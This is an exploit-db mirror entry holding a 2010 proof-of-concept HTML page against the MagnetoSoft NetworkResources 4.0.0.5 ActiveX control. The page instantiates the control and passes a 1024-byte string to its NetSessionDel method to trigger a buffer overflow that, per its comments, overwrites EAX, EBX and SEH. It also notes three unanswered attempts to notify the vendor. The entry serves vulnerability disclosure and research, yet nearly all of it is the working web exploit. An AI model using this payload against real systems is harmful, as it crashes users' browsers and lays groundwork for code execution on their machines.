MagnetoSoft NetworkResources 4.0.0.5 – ActiveX NetSessionDel (PoC)

  • 作者: s4squatch
    日期: 2010-04-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12205/
  • <html>
    <object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' /></object>
    <script language='vbscript'>
    'Magneto Software Net Resource ActiveX NetSessionDel BOF
    'Discovered by:s4squatch
    'Site:www.securestate.com
    'Date Discovered: 02/11/10
    'www:http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm
    'Download:http://www.magnetosoft.com/downloads/SystemInfoPackSetup.exe
    'Vendor Notified: 02/02/10 --> NO RESPONSE
    'Vendor Notified: 02/11/10 --> NO RESPONSE
    'Vendor Notified: 02/17/10 --> NO RESPONSE
    'Published 04/13/10
    'SKNetResource.ocx
    'Function NetSessionDel ( ByVal strServerName As String ,ByVal strClientName As String ,ByVal nSessionId As Integer ) As Long
    'progid = "SKNETRESOURCELib.SKNetResource"
    
    'EAX, EBX, SEH overwritten
    
    buff = String(1024, "A")
    
    target.NetSessionDel "defaultV", buff, 1
    
    </script>